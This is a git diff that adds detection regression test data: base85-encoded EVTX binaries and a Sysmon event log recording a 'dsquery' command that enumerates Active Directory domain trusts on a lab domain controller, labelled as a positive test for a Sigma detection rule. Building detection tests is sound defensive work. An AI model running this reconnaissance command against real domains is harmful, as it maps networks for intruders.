zC|H3%%|*IOPorw3Xy*?|M-3P2x|IrO-bAH03bnA{L}kp^9{|x@l$;D8m0EmLXf0GI zB~)E~Dhg1mQE*3>rdt&?3s4|)c3TOjhJJx-%T+hsT)W|kr$8)}XeItnQ8Vx>?>-%u zbVt3E;T-W!NgM|PqM}!IPlvE6v^luKu3)8pi4tj|t)~r7QzzkxNn1a4Gu66LO7oWL zuoMN;1wEHyy@6wxGy56S)d4D9wZyMz065}1U1eD1aJh9p8{b-}ELDilaT$kMcM)5u zszhsk(oCtfSxU{Cce!;{Dw+yksU$rDJjbfCZfYFPm7+$HK!uL{jM*rF4 zx<0uhchm5+T_sok@K&PNA7!;lRt4+Y#w_dAR_zxItL!fZg~v^&9DPRU_{%o`bkc2Y zwnLmO1qr{3L)v7%@_tYFiE7WYZaW$0sWk`SlQxmhijQCp^h+-S&d zCd4BeGn@&LP|%(9^#?^uH-;!HQDf4m!Ua{H5^IXc9&X)*HHHSo8gr$XYqe==Sb7b4xQ54kDk^C5+tj|AGAGX1S~b5Z zHBCO8*~~8GD(&I8*L168MbQBzOP*ZO7cD;w&k@dSZW}5=`jJr%S^}eNXLMHV8l#?~ z>a|;)eSMaVtX}#FNK-#Sb0CY)T?GC_vqdd)IFs5ITpq5kJRo{y8Wa*8CAv%%;IXA$ z(v`x-aYZA z381;KO+-jt0xijN{N5M8AEV24vz*eNst4m#a1U4(w*=RpR;5^*1$np?KwY&AE zd)&*S*&XyFsf&OvBJfx8aF;xAauixOKO+wM z5wu!r8fpI#P++SlLMhv4;deSmwe8uRC=+WDd4|4a)QZthh{V)F?fXQu$2Qy29#QM( zUQ@AWBe;84yt`T6_Dri)mg9Q|)LWT4Q=J7~sF!l_Tx@w2Y7oAaMppB_p-em-lwaUt01xh63l@NY~4{}-Nm-p)O-`IyUj)Y(Jz{8$(rTI;x7kxIsq0n z2i9~b40B!gA-=9W`G?~7t{qK)DfwhvRtQd~LxYULQ4TOL2sHbmC1m3pk9q_B`Jk1r z2H;#z;FZ|wk2BeL6Dj@hTQ3~_)pBS zWeflf8>PK*oP%$Da0Tyv9LkZ0d>r?}oop_7O<&wE2j}|X4&;^hJI=ayKa2amxKloU z>w#}Qaa4d3q|_7F^u@hOpe0E;Xa=(V= z9sy0mnj>d}aE@29WwIVvGrUiKy!%+x+0OdnY+qcFhqJ6RKE(iB$0w$wKFRvAxHCgF zXo6J-d)EY0fFibLTLW~!-MncK^E$TiL=mP`3HuR%Sz?{oRlssL+-Gtz&yPW?p_QVy zLf@zy+9S4Q)90nP(Ja*Kt%@1f(`Cks$Ll&gKCw&BlQ(u;dhQRqaE`ty?BRzv91X2c zi=!=RD?Br89C;uu30-6D9UWGhw(D_mjC(4@qmGVtPw95Bbd1|UgII}&s&P!|cCb{P zPG%m;hiy~o$^%)Y+aQjB?UJUz#3=aQAw=hlVeBYnqKgu(Z8CDL>ShSQ4g>~QtQ@*1 zy8%>a>|UTFGO@;`k{am-MMDKN3tUvl)Qj^em5J4G*F+-i< z^s|2{g3sH?K3<>ATdeM^)xShpn~@n+lSF1>Vr{b<8=28;^Y@eS`A7(nS!gN*k5GZ+ zl&TVnhkQ{rz3C|z9Ct<8S2^FE{^IAlAC z@i?ROD9&<-F&f$>-agm_iTs$5OiUb|H`~2E7i4N$3!OGz6XUee5hkV>JP?<*Ysnxk z1&Fd+KyS#F65l)M_oEt3?BPLBC2SXLACmy}^}2mjC$)Y2px8dPs4dbu&_0Bs$)mIn z;Vcxq_OWQ)5p$0O!bEkB*1(|}**oBISH<*aW0f&I*r+;=)Y!2Id<;9Twrwcvm!a0E zfEC27a#DyZ;;R^+w`+XeR(eAc^>3pP@D+YeJ?FreP&648dOpA6s(HJf-LZtlh>vx$6-`Cc_jo_}~e^iw01AIjId1_Y~w;v;R# zW_`W=yW_9?@U%r|-Pn4e;6^wLAa1G$oSgkWTr%n?9^W_avkA@C?(DlgbHd68@a)<@ zT#v(Aag_LnrbEVTWRdkopJ>8y)L@XJ&({N=I%I2OB{=1l@yObKV94?V0T&p=M0~(8 zR_HksCUs&=fH>08p(B))GLe9avfKsYlz4p^pLc1zPFA5L;&nFgngR`5il^1DDxqj{ zDR>pm0*Kd#cb)g?vJUox^7#5*E5`R+_S*&j-S9!%=W$x&brTMWS2#HWqGmN75;IJt zyA{hEiQ9UNONd9bfrO$TbUW)Oq@EkvL z>Wt5q({8Ja@E66iP;|p{8-%RFSpe}Y{aCD93On(xo5TdpusL4G%no+K4Z&OGP~Mb# zI`r5*TJFO;`;)t!`uMqinOiA$qhCfS#*@2n7C^a6zYP5~%Dpq*-a9N3llh6D!2a5k z@L7l+)zRoO8LLi#LK%bqV{n|0PC_@Mb{yqT9AxA3UX6p(lZu1qEgZ!5KM2KmI1tVP z-v2-x2s3DcoD*eP5aCzjs8ujrR2PKcLP z`235;%SlJP*Cu)X`oIwF#jwz@P}E)sMK`=uc8GEoK)vx~u^Z_CuYpX7|5>-nNsFTr$XMPX!-UCx-xh~=ypxmSLZ+l`a!PU z#%5Tscl~p_T@jbWX9S=3X?(U_(6r<(ANdAv{>+0e{)|v`!{?94IS6L~#HZ7r*>kBV zd(bG;VnxVvGeH#%)#~ziRvrcb55Zf#d-beyKkaVeLhRiJjgOsI`@@Gfzvnp@zegxG zf2wH0hTfMBUAgW41E0)k(U0*P@gbZA5Fbvzhxka$?{V*^G<(LK{o)h#fMR!Sc=e1- zK`6;oi@hs^KDl4x<=dp%*B`@vNVt?A$}~s3Gu)K8b@c}*W8y~@}_r=2_L4y)3&Ous8s!`5{f31 zf+OK9fH=DGvVX6BvA6x8JpSLh76J4eGtZ&T>FA+yCbifw*(mp3!!%LLA#eU0YPM=pWj9XF0$7E1$@V!4pBr`i zyeO&d^Rp1!=XBJ3G=C)&%_o)iDVzn+FBsQpRKHpMm15s6kIOo&9sBZ&YtNbR(u`H9 z(f0X0+GVY{Mtr^4wz)fFRb1Oz{CEa!E#dy%#M@_dd>1>4=s4|5ZOvO36I&HTIGOE8 z;;;vGd)m_Jn+xyWqj8u}-1TVvjDcIy%UGYa4u<) zUWWvxqvtsSTqu|tYo-(9bK-;fUzrb^+SeaGy!k`ccmbpTStuU3d2(5+i^2u#URZhh z#WTA-DEJW00*DVY4(knd;=TXbk563}Hv9~jGlha_q^eTJ3rqrT9@cuLT~cx5HeOCB znk))#gtGwp(f=RD%b8-Mc2aPYPg1jqE9#|Ud_JP_b#vu*udukKmDS}1NE5c%ea-0-lw)!oB;V5JY@rWm;*;Vgi-36@{o z4wW6DYO(q$VZWSy^(Kvvr4RbUhd2A>=2r{Fd0(WAd|>+Y5zGJe<*v5>7&=h!A)Eye zAHnylO`#}t<6Bl7Mtem6=W&gjHA%&dn_n#yO%??=!dZh~T@O?E>fgsP#YXLfSBh$8 z;Y$4KCp5k`f4#|<-SVcF-27^xXfi7J63!a@>U#34&5Evn%n@KV&a4@hPQUs|jkC9s ziZeIAS}2;2FE|s<0%-q&?^l~bQS6Zvzj_B!5l?B{{BP6tulez-z3Hd(kmon&p$Nqb zOV|B=#KTigy!^UVM_+J3<97r%!dU=uBlA$;UtsJ`B7Kq35sh9ZZkSc46fzEXwWC~V zf4;!y(^|e4woaye7g^)NV&`oLMUzR9uW%MX`O3TvVi!<6^iO`@CyP~OfsneBOR&TB~LeCHu}+w!K|)1hac z)pDQT)1TbE>2bGt4MH)V+=a6M%H0|NQtpY3?@LUVdmX)JRx=h7q5O#hj^Ep?aq!2a z;=pZQgHSXXl=d&21w5W54uUYR!4!j~H!w^J%jL*8Px=X4G+v&ZQ~iE&{XcVFgHSXX zC0?=*k8&13y&>}&&>n0218?hZB&IXWs$*Uc>rGLv)CUVd|2Zw+%f=6Q`5qtRQM}oO z4k6B4nSno$wqI33ad7odOAdN#WbV?lZ{D_a_{L1icU99UX91M&rHgx2jyTiqLd7R8G-Ly*o^C7Fo~Rldzli(DTN`KA>xlX9FNbf8iyCp9Ow&&-u%+9tvDoh zzO7I+xfC1BbYpvheEXn$?PNmNJiwuLDh7P%p55=4FkKrxyFehd2AGiWkLS5_9n3e3cm&cw$t2>irTv7z%DqhpLd0<@8Vn6<|H$C(a<8SQeFc+1lUsXbJ z{j;au{)?rhBbK+l=-3TAt40wwk&aQ$0*ISS8m0Upb*}xOJU(>ds8MrzUi8SBxAj@@ z3{LC3#e+Cx-r_KP>UATUVdo>+O)NHZk@%_+uDgK9gv#i;4_GN6?z#`|v)7}$CR_k{ z_Qu=$Bv9Uw3&NFK&bV{?Kzj=+?#{sNBe`rwiTW){Mo=YOntnRgpRhN{v!_gPn@0kA zI@~lYK8XZiVp|tsZv+E*$dy_6WV@hV?F_y8x^5qX&za_{eRzu>pJ4x|v3{vgG`W=a zA)E!UeK_MsLMZWZKFNYnB_I}WrPGdZD=`FLe{kYvk5;s>I zC;ed&;Aor1(bn@fo${AGnx_$plBan&L?vqHX|l27qHq>K969}L_Fp9KXS>g>t9$KK z2{FY^d0o%x<%oiHlULQ0=ZOpI8TMEFL*wJ@EB)can}6*#?_4N0Jz>Iso`3V$VXJ2k z35`0q`&HC4#D{PeKzum;YvLoZP`K;>xllA& z6x;}B0rY>Iel>BkKkk2MijCR{FOKRZuBexa@%fI%ms;yZ+nV^_(=$xUB~9CH8N-##vTUappGfTqv54FE|s<0%-r7OcQtNC-{1I8e*9{0`e`Zqm5g~QLh-Y-g~$GF<=7Dq_no~ycTLadiJM}~ zI}*+Uh#Q%gg7(Sz7YU?43Q(T2QHpDl7Za^LRqSokohglpu&PB^F@r0HSD<_@dZz82 z?y=dqQKd?qkO5X?+*=FqwL{DO!~dlFlDoIO#a))%W9NYgMUzR9yKojjxjW-2%02OT zs($2OSC+zBg?IWm-wX3#;i5M1!Sq8B&(JVvlo#9PESsF(bHa%0uBRvj0y{GZ?aaQ?qKYoWd`*UiD ze#b)m=}tSPs)VA+rr=393!uK)+V0K?r(Hwcj)|T)ej@+7(OY-4?y%`=_5M{jr^l7d z$05g+V25TISJJd5YlQV2YbKjc^|2R80;5Xo8L$L?cf8%EBPL5J#_viR&5md6M{*)Q z^8omcs3RL|>590eK4kvv-x|LM_49{cZ}xH*^`S8@Nhrp{uW%OdxSp_}E~HLOEN@mn zI?=4&`qhyZsu1Mh6`e;*d;7k|Ri~ul%JRdEc}POhd~nf=!dU?IqBD*su7c%Hnkgp;q@_mpr>^;lr?-LNOjbYB&qowl=jDz-_IMXpK^+!1x60rC_O74$HH4#8=nmtQd3b$T#!sJn70qloHMYs6U)> zJ^KL@kL%t0f|HXcZPP*NJgMHZQsOxF`+cDCG4Kt4`0(bpxaCQO;+DsMe`Lz7eMhX` z^~tzaSAOs@?F;cCoCOdc&Nx4q{lunFxL(p^=_j59+Q9*r=U2(-u7l#1;J-=CMA~_}VbO(3jovrkC9Eq(aeTRPZI71w5W2z8FvK z{XD5z(eAc!ck`q+&QxkBBPLJ!vBueRNyV94o>VBBk1seA&H`xvoblEEV*k($B=&Cy z0-8@WZmNFO^*%p-wKx6bwm!E|{J!$BosAybQn+E}ho$L?<(twyneug8pIa!JOp1JkvjEC>Pp;2xR-d^(H{yQh`rMysd4E}W zq_6huE&t%QKDSUb8K%5B?m;*UpuC-NGS}x#JWft*-POAC+^gE7l@Gx?x?Wv6{LIg_ z+!v4ZCwFgp+--esp%_o@!dU?2?u>sa_r&^F6O*~ue70H5SYLzkr@qg|=NB3WtCETX zxAnP&qRF7Nf8i|P@hov5Ys-0`my#G3qNSOeX8)_bNNxl@y&NEE_rf}J)pTl;8~Ky>eNHVfcMEelJ6|q{u4Er6D3Z$0F+>bAKK#2EqIi$4=S{Wi!))#ghyX zbVBB3o<*DY8;vWU?;-pnH`Aat(Q6NUJ^ zR7-bCV;cn=a?vdG)0w5+j=-->i4jYD?+)(Xv&IEXLrMv&b68xcDxqjTwBSxS3!t80 z{{q&V#@1Cf?h^Aa_8i{4`X;7`to@=sJc;ZN0p?GimHAlZ#ambKmgR3w9bJ`ngsAq@|;VgjoU>wt} zjjd;b*^g-og*%ayOF!l$;O26To0Un$jawd1D4Hw^ZiKUd#yx`$it3g9F^^}8joL{m zYkUrIMZHvv&nq;(Hgp~9%WiqoORjl5P0?hO_{wV@opCbdop_v_Si7z(kC%deA2o!M z56S%Hbm*BSTJ8sZ?oaOC^tf9dPbkKdyKojjxjW-u%001uw!~!awXe*qW&nZmr@m)? z<|>VYE=k3KTOLm+nhZ+&7tR76&k_eg$m5w}u=EDNQgzft&OF}L8ZXD6`O#0w_5aK~ zo=`LyC0-^WwIrMcP;W4gSF~zx_ujm3d|31-u2+gYEusqBS zqa3N<$3wsWQOon0jJdw#>CL}$+pktAnoNp3g|h(4)9K$)o(u4y%LJIwnHVWKi^pa29ZXQS=G>sN;?MN>ujyias$#NBx2f zn=}8hT;uE6(;o6=ue|A%#v$O#SQkPlnoJ75gtLI>Kg9p2Z<}RS+rEN1BFx5F%{(UR zvlSX=k4#A>&fNB^6^dqs3C@JG0NO8S{$t;$GC6MpgW@D6p1I=vc0F5%u4oZ+wA>nEymMp z)-zYY%?%niOY*M0=XM|du{S+*olF0}P;7q6W9!@gtxwK1cOSE^~3egW@B~@S3l#5aMLmC<~NudRAjwt z|EiQ(wMtERe9FOprrbqu+^FTh>(T3c$=_RiWQ_|n_G1-_CX*t6;Vgjicg9DQ|G%W|$QrVmkN;{2PKdXL!oEz|O$W zDvg_soBiR&o8H)L^$SmhYZaZhB^2Y~MmP%~Zk%xwag$iwRKJ+@4ubB9ecxko9 z(fK(y`La{q^v#FFk&!15iYBXqBjGIIc>?iM_O`7utJy!cXtgw+a8xxsMdBsur!^W+ zsxX;&vh0_!ZnRJ|A5`#E!&wMv3%mlfF0eBn5M29ph}bXo6W^?Ha^jARSMKl;A9?eS z-SP)Q(Jg<_2IHlLvjF-zPXBn%HBUV$i-1ufS>qpZc{ey8?1kg5h9((&$k&&KE-4s(%dDe|TRf4RbuZW> zZH}usLnGB>QE+pMMs&daV&cX*uekpAqxc;LsdE0-ub)r-HwSB*u%>5& OPv@F22QcEU{rW$2$#s1I literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json new file mode 100644 index 000000000..df3ca069d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:48:36.392892Z" + } + }, + "EventRecordID": 9075053, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:48:36.383", + "ProcessGuid": "5AA13A44-D534-68FC-FF30-000000004002", + "ProcessId": 168, + "Image": "C:\\Windows\\System32\\dsquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft AD DS/LDS query command line utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dsquery.exe", + "CommandLine": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml new file mode 100644 index 000000000..cfd84a7ca --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml @@ -0,0 +1,13 @@ +id: 91c77c64-7f4f-4bba-be6a-42377c97b48a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3bad990e-4848-4a78-9530-b427d854aac0 + title: Domain Trust Discovery Via Dsquery +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx new file mode 100644 index 0000000000000000000000000000000000000000..fe978d04967ac311e0fd54d0aaad5eef69a7fb84 GIT binary patch literal 69632 zcmeI5d2n4iwHEFEBm(xk(*rF5VT+f1g+P!gH}3c>w;&Z4*7Ye|-_ z`z&8Q-S_Ttmftz|oZtEWe&=`2Z(w44@YuwdDgCSRH_qxeYjm|TQyOI6*YBEo^}F*< zBuyZ#fwTtF8c1s(t%0-#(i%u>AgzJ42GSZxYap$Gv<7CZfq{wfzN3@(n;_k1eT>rU zv%3G2RmQYjZOr$+{?aouCOks`(!cfDM{|Y2uB|m@O}#Nctuf}s>cS_+?A86PK`BxE z=)70Y%@F6$l_!7KDo_4?=EHx@-{;;R>fU$>J-6!m=f1M8DaqrwPm8!8_vgD5c2H@4 zrX(H0%=Ry%I=GO(H;0!R5qaG@z1J0H`u#V4@tvFhW$@dX6`71_$h>-Ja$|_i`K{-k zzxRor!C!sVz3r$Yx!i(EUy3K|Pz) zZ<}e+r$c8grbpjn)7hUcy2@tGoqJjDD!jK7`)kdRc~~h=*&L^l^s*@k699^y5-fTHoLsa)K+Jf znK$Z2Xz5oksWWf$!H%h>CiN`4e3_}PR-e007omxdK38LQDj@G_!Ui$~%9=Om;tjr? z4m?_I_S<)HzYUTl!;ERt1zmu@r?0Cud-MW%EmRTNWk{*U+^CDtbMAY--rS+b59__1 zP(6;S-U(V`R#&Uq_v+$9KE+!;uuPdAvvu01pkpF{S2U_HwtDDAw5hi|y0qvGhDfTO zTC=JuvsA4m&r1fY8VhQBpAv**C~-BPUB1*Tg_d_KQeX%ldwH4Zv%#Qa!cr2dby(pB z2YnA;`qEO9Q;Jg}oYpd>lDc%4*O?WyFa=(F=a*L*vUVv^rkF^LG?#Pdjw_GAL_Yng zB`Ux}mhdw+Blmi@LxgzUC!15)g zzACfQHYb=dfA3Ng?Ni7RHKa*PH!p3a$y8^~ox4{7;A*_MTPEvmMIBdDfH>DzvNf64 zEAA9t)M>&_9h6=u7Bf41ZXn+ju?{W}}DW=Eqj{YvP|>(q_(SEH_Cf6026Xf9@D z8_iw1H>nyqq1rjEI&$pjxUMJ7!JdD^7}^#qQYRfT1E(Kq?{ug!<9)2p0PjfGB~ zZ4^a>-RQ&GSMO3@R?_4H+s!s+%?jeI^>JRGPrtmIjGAm?m8mEE4L&??-&0?sCdIHs zJIyw#8O72vsM@BK#cVj+SaY5@{R+?EN6S7r{l2n|wdbiHH#Ci^PGLLQ#=7%_g@@5K z>1huuY`qKH?aN91_;RjPyMc-$IwloCJRlGtuG&b zhsu#{TZ8-=WCvT z6_tZFf3Dh;Q@{NlPhbmM#^=ah0-E%CVRXRdFCc2yeBwOU4lgG&b~&t=S*)HsmLn9*)IbB9_ZE%8;g#3g>r z=$CLmS56hhK`-YqW210bI&!2VM>=vitpU=P2@)~mhOzpPnIz)h6c#U%&hwZbscJ-{ zAeyftiMT9IkUC4HXfF{XXOzW>lcEbGW8%QdeHrRJ!p=+4UNS~LD+^mHMSD3InU=6~ zl%l;vj9f?T^T>5x`i%@ZWbq-oIcl^(0w&EOeMblhsz!%~RNm+$C?r0@7fF2O;fEB{ z#YWncvKzUSH%;6anS6znxK=6Lt?s3*KgHroxf7O$O_vWw{mCLfr1aJX&u@ty25 zZsRxW?I491p~$>U1||mEA_vY*CNm|{R}t? zQrFb0lc$VY$SLuOvB=g@D(xF-JCU=QCNow?fRu7Ta>{nS-F=e7_M3Yo1MSomQrAwk zy&>hhPw{r>&VXW}p6@l8$HhyKQ})&vv&qW`TR(7T+w9~N&~VV`JEk+UM!&8aIi*gY zj3q-~XG4xp{@cO7rbt!(NswFuWmT1^<8R13x9jmQ<}}X5@mCJU{*1#=lFDpB}ONw9yD$dah~Ch8*MgX`n1ynf&zXKU(s1 z>rJjSod4^#f86_5_kHZTiJPCi{u!0h&zC--(=Lr)%!z`f!Ns$i0Y!EwL+ttK*8S3D zgD0nFL7|24MY2rkjH%{0Koo;+^w^u*4X`q|G-J{;k_ z4AvlQ!2A$1t5Zb?wP^mcth7jb$Ro^OAdh${Zw7e;`L5b%g2l=s%=Q$@B%FU(P4H^{ zcIcq$n9ZB=_{QO(*-9aBmKLRe6mqAe5NvSJ8b5SRoD?yj`G=D#4|o{_-z;u&w+`k3 z?hu|rugsj%My1TG5@+B+xHMQ3PL1ZAyDhrkA?^n6M6b;~&d{%*eFxIDwtv$Z+BGiFGUt%fxd0|tbEvr_T1+G&*$Frh9u7ez$$bSkq&llJZIOhyTp{zYdgDIKMt$KfgQe=eFN2j()yfz4cxl z2i4cNN!A?HIo#xJ>Z3XF&xP%&npLKM(oeT*&bH0>({DVLWIsK(lzu8JMKKEhcQ)i0 z*G~gw6)LB0+gf+^`(>q>6OQ5h`D43=HtfjsRo(ZC|NVw!d5^2UqSFh*RkOlL-m(n4 z8Bj)%Z4aX&BOLm(V*ImBV;N?K(^h6NTGY7s4nKK|Gwg!M8+xbhf(r94w%0`0>ycL^ zx+{#C*S=3{+#^d`h{EDZTAQ~Jg4!Z|aeRDN(z?8b5OIrU2nypC((ASHt-f~Nl&_se z^>St@oaL0WqYV~K*~TU2Do|-8s_s)Pbg}zweBw-7r}5^Yt;mw7urBkKL|!K!8KbZ? z`55Tt8D`5h;b_APQRoxu;MKA|YO8f9G$7H1z@2+FyC1CqFU4wk>AC(%dKPI3OJ-BM(~6e2VB0##E-U*c8j{Kc-Y-P$rgI`IOp4_oz~9S%8$# zevB?aO5IB3kkE41ylLvzyB}SUl+XknmToNm9nQAKp^0N*QbKy^T#$NV2BbSSrNSQR zTId<|5@buR^6d%jn$!KyzO6^6G;aG%+Z-rz?K{}PH>;f=*9RJr5HUG-Hm-2(W=}nf zEa2TI73zdta>1-J60_^Y>s2f5qGY@R=y3A)?CUj|`sh|&bk3=zBt-`+dV1#YUJ7}t zYqf6Pa=n%64~yr-bHUkhdbm6*Qw}k{X1+L>w)}W=es1UwtG3E{V$W0 zBkJnQ<%p1DoE#A-t8h7DHt6cZ6^O3(3thQAwq#Q(tBq)cR>;fGhpw7Sv~e`s=|;ikG$nWil@MrdCS~5WR~Ko+0;{tr%Gjq6i=P9NNy%vm*S~HoC|hI@f4Z~ zJAbuTI0`)V6X|g}Jf3>p-zJHtK3-Rjr$UZ#cq&k~2=G)-1>&jMt%*ZfBJSpP2Filp9cv8eux@s82Bi$!B2fWiF+|%jt&euPeB;NU9 z1l|cb#^Ien*&@I@Qx%AJ-Y)&oh@YK%ae5`_UDA;V&nNhkg`+heD2VcqmY|2=LG&6^e&$_IT(q?cgyJ z9%A>lhwOT#wZcA8`z8!%9*!L@*aw<*ajbV^Z|dNiVOVPc(CNBRDPBtPQi_*Syp*nC zD_+x=u3>X)I9c^xx?1`FXAN5;I0^kxy?!@)y!6AbCW)8+J_0X=9OLj(pllJ~rF|8O zmu~WSscG8&$n7E#?Y(5T^h8+9;*)4pTW+iuGMX&Am*Sul2cH=2@i^$@*OJ6R--*CMA;&lz6ewE+IB23manKt*4%$Dfd9-c9Ja{I= zVLHzf}Xc^mdp0M=6s%A3bFaj^JTPD=D^sc`+n`CI;q(( z_IYE+H|KL2t9`cS zYbxLP48m&?-do)+>3F1|E%3q12i`fj$BvTht?u@d$EQZ2Z&~IF#GdRt?J4u{fyX5FddJ2EFB~p);^K+JJ;56-9*+iXPVDdw zb@(ZARIu|Qd&J{WmeR1_CO$>j6%(&b(1%A4{F>m|gkA6P)mUU@m*HIuL{RFXkvNR} zcmpE@se*j)N{?qm=W`L7pub1Y@D&4c!S^Iy7ePn(*Kz*t@$%^W(YIRE0j>bUbm|IE zWB7RlQ-MeNbe$aD@JPB4Z@ks>xldf3B%h1I8zILyJ{KrU@rFf;$W$rbxR|n1a(Kgf zj=0|9{eU-a_5JX!wI69u&VOl?ek0@<*AD|_ml@t@^GLEwy)V^o3`$#3s%5Ecyn!wN zRDf)ccTdJ#Msc(Z=qo@8_$WmW05)L!=Hn0qKJoC==`OCbJU^p=vOEZ4|*8xgSMc%H$l9io}>NoPZi>g+dQ9pp*cxD7lk)M zj&Xc0P<9#NjhT2{iZ>Pq-tc>@2mQuT={a(~AKv;p(~%tBxYp_!i~U809OL?7psYgs zVes!8=2J@j!m`KlQq83>g%rGT;VEJ6eqrgIcu2xo90=t1p8fUF|M3M>zy<2 znudp*!$HTTw37A@dr*|I(i^X>_~RLtf2$LA1=ED|b*?U0%f!Ao&gU2Ys_?ajwF=fO z_@%|u7T@Rq@TQG~J#229b*WElp68TGj!p5TEx)sZ-yrQT+Cpj-TG%O!?o8?DG-*EaVv1&jMwaXg@=j|E&7i{QWP}&+vcT z;rm(Yf0_Pp@%=B~tDeZL<>>>wUMYzk{8bm3)WZ{K9&DJ+0h^=>PD6C&dr? zJRkVpi6r?zlz--sV;mm{lwHDnU}5|-r+fgLiBjL57oQJYT>s3b%JxtC=}Gn1e&0_| zpIejQcztsf^Y5?G$KpA$A9FV37}ZaQSLG?IP(9oWzhSv{WE_;r^)+gW`e)Wb8xArVo)dEk+aTI@me28KGlL>?@FMtaIV;t4ugGu2AA?Sy+MEPbm~0m8&D|#;#Jc#g^=D z9mqRD&MDWJcbg`Svdqvk*7Dt=ksI_K&{nBblhe42b<++zcB8e@hV?qeMHPCiE&3eN zr&V{h=-!w{bW&y{@3i;0=IRz3c3k)PI2!@-#zKIjLm}d%s6zjFZXIo@6m=oKAB}K~ zb_9jbz;C`FU*!Xy-&|qVCdh9d&6M+-kYgOb36xbhzX@`9p;v6$WK!)Do4#O6xKaEA z$(nvk?>#IFMdxXpe%7ph8RXu@)P^6X-O_&1>kj(%`&?&xg6%hI-YVo6)qeZM(gI}_ z+J2L=%Wb#3%~?RD^H!JQyj7RRCTv5nKxLK&t5oK1oJ9&YDa>49rJ9ozi*~F{XIQpi zdCM#hb3xd=3@DxaycKC-m%>cfpkfgR`&?(eg4GN9HmqZ?dLch7YSF-9QP*EKZ^dj9 z=`nZ3Y?`y0adS%8#t^?>`7m>pQyOl*4a&Gin(@-L z2kE@k;+VJcI}y|W=!fXjw)=kA^yGUJ#2Zoi^pIm*KMa&rXg{23-fH3W>GV#lA;P>> zs!vb#>HStl8j-wxVRAFJJev#k={r0h7`v1fk4?M%m)@mpPur8%Tk|i za?E!H{lM+MpZ@nf&m}lsN9hMbj&c1oPPwd3RooXLCMxg^UU2NcQeb*dKhN$(GqaiJ!j6p(0%|Z9;*RlankEoSfp@v z48!J*)wATwz86U1Na3tDWeqAvxqg6Evh1%xD$M9(K|tHXegUllb_H$^F1M-`D*!0O zf`BLJAfTI=Xd0YO0=lsfKrcXv(1Nh@29y#Oiw4%rCZ`{`UG`@iOa}X?U_Y?O^SO_F zI7vPir5^}6#__p8S%u<}B=iF_@wik!usHMsMwXh!90>Y>pU75pukVLXefRqb;*CG8 z$KH0SJ{hMmlzo55F|Hp5$}Z9U)^Af$SDFKv`3ILN@JFN_R}2_r?m+{V$*HhSl>=)2v*n zF=dP9NlNJ|-0#%cl1KSu8qpZlE<5!O^H^*;r5--_NxR*r8JhiymEYMLojhayTv9r$ zIyx?^dRFaXx$M@;uGcRk=&0VvW2#9?_n=+58$8dm$7(56Q%dW8r824X*n6JyQw3>a z35b@zbwSf?6@8mU=|a*urgGyWV!m&LUBX)QZrkUb(x~20o9cD*yi*#}o8>LczHD)A zCL4j#HWRQFKBuGH4k#9 zMT{&!S|h5hZoNZ#(0uEwO?|OVR4qh(!IL_a9^7KSbRkP14=n^;SSydJ#>N+fE+n9l z1?bhJGp@RtOTUipi;P9o)m+LKm(rM0K|?$HJy|c@N=zIZoQK@?bN$}w@!lW&*$)!L zd!LNJdm+a-ycZ~2M0jsqiuX$FWKz7h-g2W$1Mjtqql07?4nrOi?qfCT?8mNX9-1P^ zQmhtTPbq?AN2T)B%kgM5MUZo;uM|N>)mC(0%p=I8ai5W$-!XF-ycg___j%lRd`G71 